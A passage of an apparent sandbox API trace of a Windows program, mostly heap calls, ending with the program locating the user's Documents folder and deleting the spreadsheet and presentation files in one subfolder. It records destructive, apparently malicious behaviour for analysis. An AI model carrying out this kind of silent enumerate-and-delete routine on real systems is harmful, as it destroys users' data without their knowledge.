(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0266.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0266.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0266.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0266.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0266.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.824] CloseHandle (hObject=0x2d0) returned 1 [0266.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0266.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0266.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0266.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0266.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0266.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0266.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0266.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0266.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0266.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0266.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0266.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0266.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0266.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0266.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0266.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0266.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0266.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0266.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0266.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0266.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0266.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0266.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0266.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0266.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0266.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0266.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0266.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0266.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0266.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0266.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0266.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0266.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0266.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0266.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0266.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0266.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0266.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0266.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0266.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0266.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0266.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0266.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0266.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0266.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0266.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0266.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0266.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0266.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0266.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0266.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0266.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0266.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0266.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0266.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0266.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0266.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0266.831] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0266.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0266.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0266.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0266.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0266.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0266.831] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0266.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0266.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0266.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0266.832] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0266.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0266.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0266.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0266.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0266.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0266.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0266.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0266.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0266.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0266.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0266.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0266.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0266.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0266.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0266.833] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Zq0bBrnPbhA3GBBLi8", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zq0bBrnPbhA3GBBLi8", lpFilePart=0x8bedfc*="Zq0bBrnPbhA3GBBLi8") returned 0x3a [0266.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0266.834] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zq0bBrnPbhA3GBBLi8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zq0bbrnpbha3gbbli8")) returned 0x10 [0266.834] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zq0bBrnPbhA3GBBLi8\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x432bb3c0, ftCreationTime.dwHighDateTime=0x1d4c59a, ftLastAccessTime.dwLowDateTime=0x748bcd30, ftLastAccessTime.dwHighDateTime=0x1d4c705, ftLastWriteTime.dwLowDateTime=0x748bcd30, ftLastWriteTime.dwHighDateTime=0x1d4c705, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1f48, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa5660 [0266.835] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x432bb3c0, ftCreationTime.dwHighDateTime=0x1d4c59a, ftLastAccessTime.dwLowDateTime=0x748bcd30, ftLastAccessTime.dwHighDateTime=0x1d4c705, ftLastWriteTime.dwLowDateTime=0x748bcd30, ftLastWriteTime.dwHighDateTime=0x1d4c705, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1f48, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0266.835] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x127a3190, ftCreationTime.dwHighDateTime=0x1d4d31c, ftLastAccessTime.dwLowDateTime=0xb84cb890, ftLastAccessTime.dwHighDateTime=0x1d4d06f, ftLastWriteTime.dwLowDateTime=0xb84cb890, ftLastWriteTime.dwHighDateTime=0x1d4d06f, nFileSizeHigh=0x0, nFileSizeLow=0x186a7, dwReserved0=0x1f48, dwReserved1=0x4, cFileName="15f_bBmBh-NfQxl1.pps", cAlternateFileName="15F_BB~1.PPS")) returned 1 [0266.835] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zq0bBrnPbhA3GBBLi8\\15f_bBmBh-NfQxl1.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zq0bbrnpbha3gbbli8\\15f_bbmbh-nfqxl1.pps")) returned 1 [0266.837] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c7f5ce0, ftCreationTime.dwHighDateTime=0x1d4d05c, ftLastAccessTime.dwLowDateTime=0x175f3e40, ftLastAccessTime.dwHighDateTime=0x1d4d2ad, ftLastWriteTime.dwLowDateTime=0x175f3e40, ftLastWriteTime.dwHighDateTime=0x1d4d2ad, nFileSizeHigh=0x0, nFileSizeLow=0x112b2, dwReserved0=0x1f48, dwReserved1=0x4, cFileName="8oeHMtKBPGJS08f0.xls", cAlternateFileName="8OEHMT~1.XLS")) returned 1 [0266.837] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zq0bBrnPbhA3GBBLi8\\8oeHMtKBPGJS08f0.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zq0bbrnpbha3gbbli8\\8oehmtkbpgjs08f0.xls")) returned 1 [0266.838] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa392c6e0, ftCreationTime.dwHighDateTime=0x1d4d030, ftLastAccessTime.dwLowDateTime=0x861a4660, ftLastAccessTime.dwHighDateTime=0x1d4c8e2, ftLastWriteTime.dwLowDateTime=0x861a4660, ftLastWriteTime.dwHighDateTime=0x1d4c8e2, nFileSizeHigh=0x0, nFileSizeLow=0x25db, dwReserved0=0x1f48, dwReserved1=0x4, cFileName="A-x0A5dDagH56.xls", cAlternateFileName="A-X0A5~1.XLS")) returned 1 [0266.839] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zq0bBrnPbhA3GBBLi8\\A-x0A5dDagH56.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zq0bbrnpbha3gbbli8\\a-x0a5ddagh56.xls")) returned 1 [0266.840] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d66cc00, ftCreationTime.dwHighDateTime=0x1d4d565, ftLastAccessTime.dwLowDateTime=0xf9edd460, ftLastAccessTime.dwHighDateTime=0x1d4d28a, ftLastWriteTime.dwLowDateTime=0xf9edd460, ftLastWriteTime.dwHighDateTime=0x1d4d28a, nFileSizeHigh=0x0, nFileSizeLow=0x18432, dwReserved0=0x1f48, dwReserved1=0x4, cFileName="FFq H5.ots", cAlternateFileName="FFQH5~1.OTS")) returned 1 [0266.840] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zq0bBrnPbhA3GBBLi8\\FFq H5.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zq0bbrnpbha3gbbli8\\ffq h5.ots")) returned 1 [0266.842] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d66cc00, ftCreationTime.dwHighDateTime=0x1d4d565, ftLastAccessTime.dwLowDateTime=0xf9edd460, ftLastAccessTime.dwHighDateTime=0x1d4d28a, ftLastWriteTime.dwLowDateTime=0xf9edd460, ftLastWriteTime.dwHighDateTime=0x1d4d28a, nFileSizeHigh=0x0, nFileSizeLow=0x18432, dwReserved0=0x1f48, dwReserved1=0x4, cFileName="FFq H5.ots", cAlternateFileName="FFQH5~1.OTS")) returned 0 [0266.842] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0266.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0266.843] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 